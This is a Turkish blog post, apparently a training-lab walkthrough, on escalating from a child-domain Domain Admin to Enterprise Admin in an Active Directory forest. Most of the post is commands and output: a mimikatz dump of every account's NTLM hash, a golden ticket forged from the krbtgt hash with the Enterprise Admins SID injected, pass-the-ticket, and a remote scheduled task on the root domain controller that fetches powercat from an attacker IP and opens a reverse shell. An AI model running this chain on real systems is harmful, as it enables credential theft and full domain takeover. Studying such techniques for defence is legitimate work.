SSK'lı bir hacker der ki "Domain Admin mi oldun? Orda seni bekleyen bir Enterprise Admin var...(de-ja-vu?)"
Geçen yazımızda SID History'i kötüye kullanarak Enterprise Admin haklarında CIFS servisini kullanarak root domain'deki DC üzerinde ls komutunu çalıştırmayı başarabilmiştik. Şimdiki hedefimiz reverse shell olacaktır. Peki bunu nasıl yapacağız? Aslında saldırı formatımız aynı sadece trust key yerine krbtgt'nin ntlm hash'ini kullanacağız. Hadi başlayalım!
Zaten DA'iz. Bundan dolayı child domain'deki DC üzerinde mimikatz aracıyla bir dump işlemi gerçekleştirelim...
[dcorp-dc]: PS C:\Users\svcadmin\Documents> Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
.#####. mimikatz 2.1.1 (x64) built on Nov 29 2018 12:37:56
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(powershell) # lsadump::lsa /patch
Domain : dcorp / S-1-5-21-1874506631-3219952063-538504511
RID : 000001f4 (500)
User : Administrator
LM :
NTLM : af0686cc0ca8f04df42210c9ac980760
RID : 000001f5 (501)
User : Guest
LM :
NTLM :
RID : 000001f6 (502)
User : krbtgt
LM :
NTLM : ff46a9d8bd66c6efd77603da26796f35
RID : 000001f7 (503)
User : DefaultAccount
LM :
NTLM :
RID : 00000455 (1109)
User : ciadmin
LM :
NTLM : e08253add90dccf1a208523d02998c3d
RID : 00000458 (1112)
User : sqladmin
LM :
NTLM : 07e8be316e3da9a042a9cb681df19bf5
RID : 00000459 (1113)
User : websvc
LM :
NTLM : cc098f204c5887eaa8253e7c2749156f
RID : 0000045b (1115)
User : srvadmin
LM :
NTLM : a98e18228819e8eec3dfa33cb68b0728
RID : 0000045d (1117)
User : appadmin
LM :
NTLM : d549831a955fee51a43c83efb3928fa7
RID : 00000461 (1121)
User : mgmtadmin
LM :
NTLM : 95e2cd7ff77379e34c6e46265e75d754
RID : 00000462 (1122)
User : svcadmin
LM :
NTLM : b38ff50264b74508085d82c69794a4d8
RID : 0000046b (1131)
User : studentadmin
LM :
NTLM : d1254f303421d3cdbdc4c73a5bce0201
RID : 00000470 (1136)
User : sql1admin
LM :
NTLM : e999ae4bd06932620a1e78d2112138c6
RID : 000004bb (1211)
User : testda
LM :
NTLM : a16452f790729fa34e8f3a08f234a82c
RID : 0000b02d (45101)
User : Control119user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0
RID : 0000b02e (45102)
User : Control120user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0
RID : 0000b02f (45103)
User : Control121user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0
RID : 0000b030 (45104)
User : Control122user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0
RID : 0000b031 (45105)
User : Control123user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0
RID : 0000b032 (45106)
User : Control124user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0
RID : 0000b033 (45107)
User : Control125user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0
RID : 0000b034 (45108)
User : Control126user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0
RID : 0000b035 (45109)
User : Control127user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0
RID : 0000b036 (45110)
User : Control128user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0
RID : 0000b037 (45111)
User : Control129user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0
RID : 0000b038 (45112)
User : Control130user
LM :
NTLM : 64f12cddaa88057e06a81b54e73b949b
RID : 0000b039 (45113)
User : Support119user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 0000b03a (45114)
User : Support120user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 0000b03b (45115)
User : Support121user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 0000b03c (45116)
User : Support122user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 0000b03d (45117)
User : Support123user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 0000b03e (45118)
User : Support124user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 0000b03f (45119)
User : Support125user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 0000b040 (45120)
User : Support126user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 0000b041 (45121)
User : Support127user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 0000b042 (45122)
User : Support128user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 0000b043 (45123)
User : Support129user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 0000b044 (45124)
User : Support130user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 0000b045 (45125)
User : VPN119user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 0000b046 (45126)
User : VPN120user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 0000b047 (45127)
User : VPN121user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 0000b048 (45128)
User : VPN122user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 0000b049 (45129)
User : VPN123user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 0000b04a (45130)
User : VPN124user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 0000b04b (45131)
User : VPN125user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 0000b04c (45132)
User : VPN126user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 0000b04d (45133)
User : VPN127user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 0000b04e (45134)
User : VPN128user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 0000b04f (45135)
User : VPN129user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 0000b050 (45136)
User : VPN130user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 0000b052 (45138)
User : student119
LM :
NTLM : 15fb3d37379865ee2c2ec48b2bdab4dc
RID : 0000b053 (45139)
User : student120
LM :
NTLM : 3ed7cc36e236cbd7bc23ec1f590f7824
RID : 0000b054 (45140)
User : student121
LM :
NTLM : f24a8075f83be221bd45b154deba0a30
RID : 0000b055 (45141)
User : student122
LM :
NTLM : de8324633de5a658386a51bae7e5ee7b
RID : 0000b056 (45142)
User : student123
LM :
NTLM : e46d877c7b0f351f4487af165ebc42af
RID : 0000b057 (45143)
User : student124
LM :
NTLM : fa5e61c40180c65bbbbccef232fd6bcd
RID : 0000b058 (45144)
User : student125
LM :
NTLM : 0c5079bb21ea06b73464f1339083422d
RID : 0000b059 (45145)
User : student126
LM :
NTLM : d78f29a72849daca2d8b1e05d6b17cc3
RID : 0000b05a (45146)
User : student127
LM :
NTLM : 3ec6caba66ebc57699e360fb72ba7c9a
RID : 0000b05b (45147)
User : student128
LM :
NTLM : b90831875de23927f54c44824da8e373
RID : 0000b05c (45148)
User : student129
LM :
NTLM : b39bfc4451c0866179f7ce03fcf8f34b
RID : 0000b05d (45149)
User : student130
LM :
NTLM : c4e4d30534c8364fb7906d6f640d0b62
RID : 000003e8 (1000)
User : DCORP-DC$
LM :
NTLM : 044a9b97eb7827ebd84eddb493d2e99b
RID : 00000454 (1108)
User : DCORP-MGMT$
LM :
NTLM : 639c1adde3e0d1ba0d733c7d0d8f23ec
RID : 00000456 (1110)
User : DCORP-CI$
LM :
NTLM : bc7c774ae1c2f9325adee16ff86681fc
RID : 00000457 (1111)
User : DCORP-MSSQL$
LM :
NTLM : 5acf09c93df6805adf482810cc1a38e6
RID : 0000045a (1114)
User : DCORP-ADMINSRV$
LM :
NTLM : 5e77978a734e3a7f3895fb0fdbda3b96
RID : 00000468 (1128)
User : DCORP-APPSRV$
LM :
NTLM : dae2eb887cf962b2907c1273459b58e2
RID : 0000046f (1135)
User : DCORP-SQL1$
LM :
NTLM : 130bb98c073825e0f4924622aa6eda7a
RID : 00000865 (2149)
User : DCORP-STDADM$
LM :
NTLM : ed3005093d910e9413a7f0293df473d3
RID : 0000b05e (45150)
User : DCORP-STD119$
LM :
NTLM : fa57080ed16d628893f7a54d3c2b5391
RID : 0000b05f (45151)
User : DCORP-STD120$
LM :
NTLM : 4d228e9b1693fcb793575e6a9919f591
RID : 0000b060 (45152)
User : DCORP-STD121$
LM :
NTLM : 2f7c3547b8eea381ac502a03a22092fb
RID : 0000b061 (45153)
User : DCORP-STD122$
LM :
NTLM : 6849309385bc87fe3fcb6e4f0e2b154a
RID : 0000b062 (45154)
User : DCORP-STD123$
LM :
NTLM : 6b12c7b8e0d8887fb52005da3f43b378
RID : 0000b063 (45155)
User : DCORP-STD124$
LM :
NTLM : 8db7f6258bc3943c9d0f4b648f9cf455
RID : 0000b064 (45156)
User : DCORP-STD125$
LM :
NTLM : d68b3bf637335b0b2ab85335cdc59e4f
RID : 0000b065 (45157)
User : DCORP-STD126$
LM :
NTLM : a6a69f6bda9a3180c7e49d9eb1a5907b
RID : 0000b066 (45158)
User : DCORP-STD127$
LM :
NTLM : 3a3c850c70b743d0d596610d03683ccf
RID : 0000b067 (45159)
User : DCORP-STD128$
LM :
NTLM : 0fad619c814ffeb129913c769d5e36dc
RID : 0000b068 (45160)
User : DCORP-STD129$
LM :
NTLM : 86008b07fdc9308a7d39fd537940dbd7
RID : 0000b069 (45161)
User : DCORP-STD130$
LM :
NTLM : 275969e8e73a86af788a569c0893deb8
RID : 0000044f (1103)
User : mcorp$
LM :
NTLM : fbf363baad2308075117c0fa4ba525ee
RID : 00000450 (1104)
User : us$
LM :
NTLM : d86b6d4c38663e716632bd34373053b4
RID : 000004bd (1213)
User : ecorp$
LM :
NTLM : 74bbc1d7f376d979dae83f0a79682516Harika bizim için gerekli olan ntlm:ff46a9d8bd66c6efd77603da26796f35
Daha sonrasında domain sids'leri alalım.
PS C:\Windows\system32> Import-Module C:\AD\PowerSploit\Recon\Recon.psd1
PS C:\Windows\system32> Get-DomainSID
S-1-5-21-1874506631-3219952063-538504511
PS C:\Windows\system32> Get-DomainSID -Domain moneycorp.local
S-1-5-21-280534878-1496970234-700767426Şimdi mimikatz ile saldırımızı başlatıp bir bilet oluşturalım. Ama öncesinde bir test işlemi gerçekleştirelim.
PS C:\Windows\system32> gwmi -class win32_operatingsystem -ComputerName mcorp-dc.moneycorp.local
gwmi : Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))
At line:1 char:1
+ gwmi -class win32_operatingsystem -ComputerName mcorp-dc.moneycorp.lo ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Get-WmiObject], UnauthorizedAccessException
+ FullyQualifiedErrorId : System.UnauthorizedAccessException,Microsoft.PowerShell.Commands.GetWmiObjectCommand
Evet beklendiği gibi bir hata aldık. Şimdi TGT olu;turalim ve RAM'e dahil edelim.
PS C:\Windows\system32> Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:C:\
AD\krbtgt_tkt.kirbi"'
.#####. mimikatz 2.1.1 (x64) built on Nov 29 2018 12:37:56
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(powershell) # kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:C:\AD\krbtgt_tkt.kirbi
User : Administrator
Domain : dollarcorp.moneycorp.local (DOLLARCORP)
SID : S-1-5-21-1874506631-3219952063-538504511
User Id : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-280534878-1496970234-700767426-519 ;
ServiceKey: ff46a9d8bd66c6efd77603da26796f35 - rc4_hmac_nt
Lifetime : 1/27/2021 12:28:00 PM ; 1/25/2031 12:28:00 PM ; 1/25/2031 12:28:00 PM
-> Ticket : C:\AD\krbtgt_tkt.kirbi
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Final Ticket Saved to file !PS C:\Windows\system32> Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\krbtgt_tkt.kirbi"'
.#####. mimikatz 2.1.1 (x64) built on Nov 29 2018 12:37:56
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(powershell) # kerberos::ptt C:\AD\krbtgt_tkt.kirbi
* File: 'C:\AD\krbtgt_tkt.kirbi': OKHarika! Kontrol işlemini tekrarlayalım.
PS C:\Windows\system32> gwmi -class win32_operatingsystem -ComputerName mcorp-dc.moneycorp.local
SystemDirectory : C:\Windows\system32
Organization :
BuildNumber : 14393
RegisteredUser : Windows User
SerialNumber : 00377-80000-00000-AA867
Version : 10.0.14393Yoksa bir reverse shell mi geliyor? Uzaktan bir schedule task oluşturarak reverse shell alabliriz.
Öncelikle bir dinleme noktası oluşturalım. Burada firewall ayarlamalırınızı yapmanız gerekecektir.
PS C:\Windows\system32> Import-Module C:\AD\powercat.ps1
PS C:\Windows\system32> powercat -l -v -p 443 -t 10000
VERBOSE: Set Stream 1: TCP
VERBOSE: Set Stream 2: Console
VERBOSE: Setting up Stream 1...
VERBOSE: Listening on [0.0.0.0] (port 443)
Daha sonrasında task'ımızı oluşturalım.
PS C:\Windows\system32> schtasks.exe /create /S mcorp-dc.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "KUDAY4REVERSE" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString('''http://172.16.100.130/powercat.ps1'''); powercat -c 172.16.100.130 4
43 -e cmd;'"
WARNING: The task name "KUDAY4REVERSE" already exists. Do you want to replace it (Y/N)? y
SUCCESS: The scheduled task "KUDAY4REVERSE" has successfully been created.Ve şimdi task'ımızı çalıştıralım.
PS C:\Windows\system32> schtasks /Run /S mcorp-dc.moneycorp.local /TN "KUDAY4REVERSE"
SUCCESS: Attempted to run the scheduled task "KUDAY4REVERSE".Harika! Reverse Shell'imizin gelmesi gerekiyor.
PS C:\Windows\system32> powercat -l -v -p 443 -t 10000
VERBOSE: Set Stream 1: TCP
VERBOSE: Set Stream 2: Console
VERBOSE: Setting up Stream 1...
VERBOSE: Listening on [0.0.0.0] (port 443)
VERBOSE: Connection from [172.16.1.1] port [tcp] accepted (source port 63105)
VERBOSE: Setting up Stream 2...
VERBOSE: Both Communication Streams Established. Redirecting Data Between Streams...
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>hostname
hostname
mcorp-dc
C:\Windows\system32>Artık burdan sonrası size kalmış...
İlk Yorumu Siz Yapın